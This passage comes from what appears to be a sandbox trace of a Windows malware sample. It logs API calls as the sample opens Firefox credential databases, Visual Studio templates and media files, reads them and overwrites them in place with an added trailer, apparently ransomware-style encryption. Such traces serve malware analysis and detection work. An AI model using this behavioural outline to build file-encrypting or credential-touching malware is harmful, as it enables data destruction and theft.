dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x49c459 [0184.986] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x2000, lpOverlapped=0x0) returned 1 [0184.988] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x49c459 [0184.988] WriteFile (in: hFile=0x1dc, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2d5f28c*=0x2588, lpOverlapped=0x0) returned 1 [0186.939] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0186.939] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0186.939] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0186.940] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0x2000, lpOverlapped=0x0) returned 1 [0186.940] CloseHandle (hObject=0x1dc) returned 1 [0187.181] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0187.182] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0187.182] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1907b8a [0187.182] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0187.182] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0187.183] ReleaseMutex (hMutex=0x168) returned 1 [0187.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Wildlife.wmv", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0187.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Wildlife.wmv", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wildlife.wmv", lpUsedDefaultChar=0x0) returned 12 [0187.183] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0187.203] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0187.207] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0187.208] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0187.227] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0187.232] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0187.233] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0187.241] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0187.245] VirtualAlloc (lpAddress=0x0, dwSize=0x90000, flAllocationType=0x101000, flProtect=0x4) returned 0x7eef0000 [0187.257] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0187.260] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1905b8a [0187.260] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x2000, lpOverlapped=0x0) returned 1 [0187.290] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1905b8a [0187.293] VirtualAlloc (lpAddress=0x0, dwSize=0x90000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ee60000 [0187.715] VirtualFree (lpAddress=0x7eef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.719] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x2588, lpOverlapped=0x0) returned 1 [0187.922] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0187.922] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0187.922] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0187.923] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0187.923] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0187.923] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0187.924] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0187.924] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0187.925] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0187.925] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0187.925] VirtualFree (lpAddress=0x7ee60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.930] CloseHandle (hObject=0x1dc) returned 1 [0187.930] GetCurrentThreadId () returned 0x87c [0187.930] GetCurrentThreadId () returned 0x87c [0187.930] GetCurrentThreadId () returned 0x87c [0187.930] SetEvent (hEvent=0xc4) returned 1 [0187.931] RtlExitUserThread (Status=0x0) Thread: id = 14 os_tid = 0x8bc [0060.377] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.379] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.379] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4000 [0060.379] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.379] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.379] ReleaseMutex (hMutex=0x168) returned 1 [0060.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="key3.db", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0060.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="key3.db", cchWideChar=7, lpMultiByteStr=0x1f7a96c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="key3.db", lpUsedDefaultChar=0x0) returned 7 [0060.379] ReadFile (in: hFile=0x1ac, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.384] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3000 [0060.384] ReadFile (in: hFile=0x1ac, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.384] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3000 [0060.384] WriteFile (in: hFile=0x1ac, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.384] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0060.384] WriteFile (in: hFile=0x1ac, lpBuffer=0x2668b68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668b68*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0060.385] CloseHandle (hObject=0x1ac) returned 1 [0060.387] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.387] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.387] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x70000 [0060.388] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.388] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.388] ReleaseMutex (hMutex=0x168) returned 1 [0060.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="extensions.sqlite", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="extensions.sqlite", cchWideChar=17, lpMultiByteStr=0x1f8867c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="extensions.sqlite", lpUsedDefaultChar=0x0) returned 17 [0060.388] ReadFile (in: hFile=0x1ac, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0060.412] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x6f000 [0060.412] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ec3308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec3308*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.415] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x6f000 [0060.415] WriteFile (in: hFile=0x1ac, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.416] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0060.416] WriteFile (in: hFile=0x1ac, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0060.416] CloseHandle (hObject=0x1ac) returned 1 [0060.445] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\aboutbox.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.445] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.445] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x8b52 [0060.446] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.446] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.446] ReleaseMutex (hMutex=0x168) returned 1 [0060.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AboutBox.zip", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0060.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AboutBox.zip", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AboutBox.zip", lpUsedDefaultChar=0x0) returned 12 [0060.446] ReadFile (in: hFile=0x1ac, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0060.449] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x7b52 [0060.449] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ec3308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec3308*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.449] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x7b52 [0060.450] WriteFile (in: hFile=0x1ac, lpBuffer=0x26b4038*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4038*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.451] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0060.451] WriteFile (in: hFile=0x1ac, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0060.451] CloseHandle (hObject=0x1ac) returned 1 [0060.453] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\emptydatabase.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.454] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.455] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x341 [0060.455] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.455] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.455] ReleaseMutex (hMutex=0x168) returned 1 [0060.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EmptyDatabase.zip", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EmptyDatabase.zip", cchWideChar=17, lpMultiByteStr=0x1f8867c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EmptyDatabase.zip", lpUsedDefaultChar=0x0) returned 17 [0060.455] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ec3328, nNumberOfBytesToRead=0x341, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ec3328*, lpNumberOfBytesRead=0x2e9f2bc*=0x341, lpOverlapped=0x0) returned 1 [0060.458] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0060.458] WriteFile (in: hFile=0x1ac, lpBuffer=0x2662a28*, nNumberOfBytesToWrite=0x8c9, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2662a28*, lpNumberOfBytesWritten=0x2e9f2d0*=0x8c9, lpOverlapped=0x0) returned 1 [0060.458] CloseHandle (hObject=0x1ac) returned 1 [0060.459] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\TextFile.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\textfile.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.460] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.460] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x226 [0060.460] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.460] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.460] ReleaseMutex (hMutex=0x168) returned 1 [0060.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TextFile.zip", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0060.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TextFile.zip", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TextFile.zip", lpUsedDefaultChar=0x0) returned 12 [0060.460] ReadFile (in: hFile=0x1ac, lpBuffer=0x1f257f8, nNumberOfBytesToRead=0x226, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f257f8*, lpNumberOfBytesRead=0x2e9f2bc*=0x226, lpOverlapped=0x0) returned 1 [0060.462] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0060.462] WriteFile (in: hFile=0x1ac, lpBuffer=0x2662a28*, nNumberOfBytesToWrite=0x7ae, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2662a28*, lpNumberOfBytesWritten=0x2e9f2d0*=0x7ae, lpOverlapped=0x0) returned 1 [0060.462] CloseHandle (hObject=0x1ac) returned 1 [0060.463] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dialog.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dialog.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac 